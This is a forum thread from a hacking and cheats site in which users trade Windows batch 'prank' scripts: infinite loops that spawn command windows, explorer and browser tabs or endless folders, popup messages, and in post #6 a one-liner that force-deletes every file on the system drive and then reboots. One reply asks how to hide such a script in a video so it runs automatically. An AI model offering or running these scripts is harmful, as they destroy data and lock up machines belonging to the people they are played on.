Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Programming Tutorials › notepad.bat tricks

Lightbulbnotepad.bat tricks

Posts 1–10 of 10 · Page 1 of 1
reyes94x
reyes94x
notepad.bat tricks
hey people, iv seen all of this posts about the same shutdown "fake virus" and cmd tricks so ifd like to tell u some of them(5) depending on the thanks il try to get u more

this one starts cmds and my documents...alot of them
@echo off
:A
start
explorer
goto :A


opens internet pages(u can add as many as you want to)
@echo off
:A
start www. google .com sorry
goto :A

makes a bunch of folders...my pc is in spanish so you may have to change the directory to one in english its the "cd "C:\Documents..."" thing
@echo off
:folder
md %random%
cd "C:\Documents and Settings\All Users\Escritorio"
goto :folder

timer
@echo off
:A
echo 31
ping localhost -n 2 > nul
cls
echo 30
ping localhost -n 2 > nul
etc....
goto :A


lol error messages
@echo off
msg * hello
msg * you can edit this text
msg * exept the "msg * " thing


so maybe ill add some more but their all encrypted about 3 years ago and i forgot the password so itl take me some time to post them...
#1 · edited 17y ago · 17y ago
DO
dom
here is one to shutdown a PC

-link removed, paste actual code =\-
#2 · edited 17y ago · 17y ago
Dorado
Dorado
good nice ty
#3 · 17y ago
Toymaker
Toymaker
TASKKILL /F /IM "notepad.exe" I learned this file/process closer trick today, enjoy =p You can delete things if their task isn't running ; )
#4 · 17y ago
-J
-Jerry™
anyway to put this in a movie or clip and make it auto extract
#5 · 17y ago
NI
nicwheeler
i have a better one ...
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
#6 · 17y ago
NI
nicwheeler
and another
@ECHO OFF

04

:A

ECHO %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM%

GOTO A
#7 · 17y ago
reyes94x
reyes94x
lol ya but with the %random% thing it doesnt look so good as if u put the digits ur self

@echo off
02
:A
echo 1 2 3 5 6 7 8 9 8 7 6 5 5 4 6 7 5 7 8 9 5 3 6 8 6 4 2 1 6 1 3 4 5 6 7 8 9 0 7 5 4 2
goto A
#8 · 17y ago
Seathre
Seathre
@ECHO OFF

:A

start

GOTO A

Now that can get annoying if applied correctly...
#9 · 17y ago
edward3058
edward3058
i did not understand any of that.. time to read it again.. O.o lol kk
#10 · 17y ago
Posts 1–10 of 10 · Page 1 of 1

Post a Reply

Similar Threads

  • notepad.bat tricksBy [MP][GH] in General
    3Last post 16y ago
  • CODING TRICK W/ NOTEPAD!By icantlolanymore in C++/C Programming
    15Last post 17y ago
  • CODING TRICK W/ NOTEPAD [PLEASE DONT MOVE THIS SECTION HAS LOTS OF PPL ONLINE]!By icantlolanymore in Programming Tutorials
    25Last post 16y ago
  • Notepad TricksBy Spookerzz in Programming Tutorials
    11Last post 16y ago
  • CODING TRICK W/ NOTEPAD [PLEASE DONT MOVE THIS SECTION HAS LOTS OF PPL ONLINE]!By icantlolanymore in Combat Arms Hacks & Cheats
    20Last post 17y ago

Tags for this Thread

#notepadbat#tricks